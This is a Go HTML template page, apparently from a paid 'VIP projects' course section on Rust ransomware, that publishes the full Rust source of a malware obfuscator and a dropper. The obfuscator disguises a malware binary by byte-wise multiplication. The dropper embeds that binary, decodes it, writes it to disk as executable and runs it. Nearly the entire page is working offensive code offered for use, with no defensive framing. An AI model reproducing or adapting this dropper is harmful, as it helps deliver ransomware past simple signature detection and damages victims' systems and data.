malware-dropper.gohtml (7407B)


      1 {{ define "sub-content" }}
      2 
      3 <nav aria-label="breadcrumb">
      4   <ol class="breadcrumb">
      5     <li class="breadcrumb-item"><a href="/vip">VIP</a></li>
      6     <li class="breadcrumb-item"><a href="/vip/projects">Projects</a></li>
      7     <li class="breadcrumb-item active">{{ t "Rust Ransomware" . }}</li>
      8   </ol>
      9 </nav>
     10 
     11 <h3>Malware dropper</h3>
     12 <p>
     13 </p>
     14 
     15 <p>Full source code (rust):</p>
     16 
     17 <h4 class="mt-5 mb-3">obfuscator/main.rs</h4>
     18 <!-- Code begin -->
     19 <div style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
     20     <table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
     21 <pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 1
     22 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 2
     23 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 3
     24 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 4
     25 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 5
     26 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 6
     27 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 7
     28 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 8
     29 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 9
     30 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">10
     31 </span></pre></td>
     32         <td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
     33 <pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><span style="color:#66d9ef">use</span> std::fs;
     34 
      35 <span style="color:#75715e">// Malware obfuscator takes the released &#34;malware&#34; and multiplies each byte by 255 (wrapping)
     36 </span><span style="color:#75715e"></span><span style="color:#75715e">// to produce the &#34;malware_obfuscated&#34; file that will be embedded inside the &#34;dropper&#34;
     37 </span><span style="color:#75715e"></span><span style="color:#66d9ef">fn</span> <span style="color:#a6e22e">main</span>() {
     38     <span style="color:#66d9ef">let</span> content <span style="color:#f92672">=</span> fs::read(<span style="color:#e6db74">&#34;./malware&#34;</span>).unwrap();
     39     <span style="color:#66d9ef">let</span> obfuscated: Vec<span style="color:#f92672">&lt;</span><span style="color:#66d9ef">u8</span><span style="color:#f92672">&gt;</span> <span style="color:#f92672">=</span> content.iter().map(<span style="color:#f92672">|</span>c<span style="color:#f92672">|</span> c.wrapping_mul(<span style="color:#ae81ff">255</span>)).collect();
     40     fs::write(<span style="color:#e6db74">&#34;./malware_obfuscated&#34;</span>, obfuscated).unwrap();
     41 }
     42 
     43 </pre></td></tr></table>
     44 </div>
     45 <!-- Code end -->
     46 
     47 <h4 class="mt-5 mb-3">dropper/main.rs</h4>
     48 
     49 <!-- Code begin -->
     50 <div style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
     51   <table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
     52 <pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 1
     53 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 2
     54 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 3
     55 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 4
     56 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 5
     57 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 6
     58 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 7
     59 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 8
     60 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 9
     61 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">10
     62 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">11
     63 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">12
     64 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">13
     65 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">14
     66 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">15
     67 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">16
     68 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">17
     69 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">18
     70 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">19
     71 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">20
     72 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">21
     73 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">22
     74 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">23
     75 </span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">24
     76 </span></pre></td>
     77     <td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
     78 <pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><span style="color:#66d9ef">use</span> std::fs;
     79 <span style="color:#66d9ef">use</span> std::io::Write;
     80 <span style="color:#66d9ef">use</span> std::os::unix::fs::OpenOptionsExt;
     81 <span style="color:#66d9ef">use</span> std::process::Command;
     82 
     83 <span style="color:#66d9ef">fn</span> <span style="color:#a6e22e">main</span>() {
     84     <span style="color:#66d9ef">let</span> ransomware_bytes <span style="color:#f92672">=</span> include_bytes<span style="color:#f92672">!</span>(<span style="color:#e6db74">&#34;malware_obfuscated&#34;</span>);
      85     <span style="color:#75715e">// de-obfuscate embedded binary (same wrapping multiply by 255 as the obfuscator: the transform is its own inverse)
     86 </span><span style="color:#75715e"></span>    <span style="color:#66d9ef">let</span> decrypted: Vec<span style="color:#f92672">&lt;</span><span style="color:#66d9ef">u8</span><span style="color:#f92672">&gt;</span> <span style="color:#f92672">=</span> ransomware_bytes
     87         .iter()
     88         .map(<span style="color:#f92672">|</span>c<span style="color:#f92672">|</span> c.wrapping_mul(<span style="color:#ae81ff">255</span>))
     89         .collect();
     90     <span style="color:#75715e">// drop the binary on the machine
     91 </span><span style="color:#75715e"></span>    <span style="color:#66d9ef">let</span> <span style="color:#66d9ef">mut</span> f <span style="color:#f92672">=</span> fs::OpenOptions::new()
     92         .create(<span style="color:#66d9ef">true</span>)
     93         .write(<span style="color:#66d9ef">true</span>)
     94         .mode(<span style="color:#ae81ff">0o777</span>)
     95         .open(<span style="color:#e6db74">&#34;malware_dropped&#34;</span>)
     96         .unwrap();
     97     f.write(decrypted.as_slice()).unwrap();
     98     <span style="color:#75715e">// Execute the binary
     99 </span><span style="color:#75715e"></span>    Command::new(<span style="color:#e6db74">&#34;./malware_dropped&#34;</span>).output().unwrap();
    100 }
    101 
    102 </pre></td></tr></table>
    103 </div>
    104 <!-- Code end -->
    105 
    106 {{ end }}